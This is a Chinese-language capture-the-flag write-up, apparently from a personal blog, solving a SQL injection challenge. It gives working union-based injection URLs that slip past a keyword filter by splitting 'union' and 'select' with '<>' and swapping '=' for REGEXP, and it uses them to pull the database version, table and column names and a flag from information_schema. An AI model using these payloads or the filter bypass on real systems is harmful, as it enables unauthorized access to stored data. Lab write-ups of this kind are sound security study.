• SQL


    看提示,他告诉我是个注入。。。试试

    url处疯狂尝试?id=1’,1”,1),1’),1”),1’#......发现都没有报错,看来不是报错注入了

    然后尝试直接使用union select 123发现也不行。。。。有点蒙,看了下别人的wp才知道这里的union = select被过滤了,具体也没搞懂怎么发现的,因为unionselecturl中的回显没问题。。。。。Bp抓了也看不出问题,网页提交也只是inj code。。。。具体解决方法是使用在unionselect中放置<>=REGEXP代替,双写和混插也会被过滤掉。。。真是个新奇的解法

    不管了,抛开这个题还是很简单的

    直接?id=1 un<>ion sel<>ect 1,2,3 

    回显了个2,直接在2处进行注入

    查版本:?id=1 un<>ion sel<>ect 1,version(),3

    查数据库名:?id=1 un<>ion sel<>ect 1,database(),3

    查数据表:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(table_name) from information_schema.tables where table_schema REGEXP %27sqli%27),3

    查列:?id=1 un<>ion se<>lect 1,(se<>lect group_concat(column_name)from information_schema.columns where table_name REGEXP 'info'),3 

    查信息:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(flAg_T5ZNdrm) from info),3

  • 相关阅读:
    CodeForces 587A
    矩阵快速幂模板
    LCA模板
    Codeforces Round #226 (Div. 2 )
    Codeforces Round #225 (Div. 2)
    SGU132
    SRM 599 DIV 2
    POJ1038
    SGU223
    POJ1185
  • 原文地址:https://www.cnblogs.com/wosun/p/11241048.html
Copyright © 2020-2023  润新知